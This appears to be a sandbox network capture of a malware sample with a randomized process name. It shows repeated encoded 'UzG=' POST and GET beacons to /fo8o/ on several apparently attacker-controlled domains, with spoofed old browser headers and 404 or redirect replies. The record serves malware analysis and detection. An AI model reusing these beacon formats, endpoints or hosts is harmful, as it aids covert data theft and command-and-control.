Dec 24, 2024 08:26:08.609363079 CET	637	IN	HTTP/1.1 404 Not Found Date: Tue, 24 Dec 2024 07:26:08 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49994	66.29.149.46	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:26:09.974004984 CET	515	OUT	GET /fo8o/?UzG=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&SFst=D27DuB HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.techchains.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 24, 2024 08:26:11.200171947 CET	652	IN	HTTP/1.1 404 Not Found Date: Tue, 24 Dec 2024 07:26:11 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49995	195.110.124.133	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:26:17.053678989 CET	799	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 53 30 5a 7a 49 56 54 58 76 4b 5a 37 6d 56 63 63 63 59 53 44 52 4c 2b 39 4a 4d 44 5a 2f 48 79 67 4b 62 4b 62 65 45 3d Data Ascii: UzG=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCiS0ZzIVTXvKZ7mVcccYSDRL+9JMDZ/HygKbKbeE=
Dec 24, 2024 08:26:18.365266085 CET	367	IN	HTTP/1.1 404 Not Found Date: Tue, 24 Dec 2024 07:26:18 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49996	195.110.124.133	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:26:19.707659006 CET	819	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 6e 47 74 61 45 30 49 50 6d 62 36 70 4c 36 46 4a 51 39 6c 62 6e 74 6f 38 6a 36 61 62 54 45 79 6f 71 74 6e 42 52 77 Data Ascii: UzG=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxnGtaE0IPmb6pL6FJQ9lbnto8j6abTEyoqtnBRw
Dec 24, 2024 08:26:21.013710022 CET	367	IN	HTTP/1.1 404 Not Found Date: Tue, 24 Dec 2024 07:26:20 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49997	195.110.124.133	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:26:22.363699913 CET	1836	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1240 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4e 51 6d 4a 43 66 2f 72 36 30 52 65 49 71 72 39 59 76 57 4b 61 34 34 35 6f 6a 44 76 49 4c 39 54 6f 4b 68 7a 2b 48 2b 32 33 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 4f 32 53 7a 58 78 48 55 52 70 76 65 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 70 75 [TRUNCATED] Data Ascii: UzG=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWNQmJCf/r60ReIqr9YvWKa445ojDvIL9ToKhz+H+23Z5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EO2SzXxHURpveCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adMKOJWb586q0++bqb0hnKbeHTSSOaeXEfwuVRmO72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQ4K9J+v++n+MLZPtINn7STocl2A3Ct0TVuxuY+wgnsJMFRG6tA1RxuVLLvV1AnZhNx1HNnssc7WE/yLrcWMbUzBHXPc1kNCaBFFnx1U97uOS5kDZbbXMP2pDR6ux3gwd0AagBpgRl442rnmHx75cXU3eHxJswxungZDTNQUv505kKZxzw80dtlHOLk/pB/gRWWcZyZbk4ZdNQgs0BmrEzW8TVxt2k82jaSmoGnYjN9XoLQoV1V3MLEI+nuki6gSo2cPk1fxAh9p0o2ralwtZD0t//uTMCXDbrg8fVhD0Ly282XddZXUlAbrcOnA4Vo3SKxFUIZP/22/L8OhkvlybwgHCNEEkxzqhuyeOjkETJOhlPkmzcj/nIXmJCv/eM4YwZqaqLiZRh9WHtxfMi1fKrPdWm4edZPAx0FNzhKyMjvpHto3OeOWNpYDhPl3lVs0qQ1YNP/3AFuKWVkfqkP8N6s1Tl+CTchdpVnnfFygV02iAEx8s/ZD01jKVKesA0Wv8lObFdlA1utCJQSEcps [TRUNCATED]
Dec 24, 2024 08:26:23.672518015 CET	367	IN	HTTP/1.1 404 Not Found Date: Tue, 24 Dec 2024 07:26:23 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49998	195.110.124.133	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:26:25.018898964 CET	521	OUT	GET /fo8o/?SFst=D27DuB&UzG=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.elettrosistemista.zip Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 24, 2024 08:26:26.330123901 CET	367	IN	HTTP/1.1 404 Not Found Date: Tue, 24 Dec 2024 07:26:26 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49999	217.196.55.202	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:26:48.525791883 CET	787	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 4d 30 71 68 75 2f 53 71 4b 4c 44 43 47 38 4e 50 79 48 34 57 42 74 34 68 7a 43 79 55 71 71 52 6a 37 71 63 30 57 30 3d Data Ascii: UzG=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuM0qhu/SqKLDCG8NPyH4WBt4hzCyUqqRj7qc0W0=
Dec 24, 2024 08:26:49.799134016 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Tue, 24 Dec 2024 07:26:49 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	50000	217.196.55.202	80	3440	C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2024 08:26:51.177751064 CET	807	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 55 7a 47 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 42 41 78 67 4b 46 46 61 4c 34 35 59 36 73 71 42 6a 43 35 30 6a 4c 41 61 59 62 59 48 4c 72 6a 6c 56 48 6b 36 30 65 Data Ascii: UzG=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhBAxgKFFaL45Y6sqBjC50jLAaYbYHLrjlVHk60e
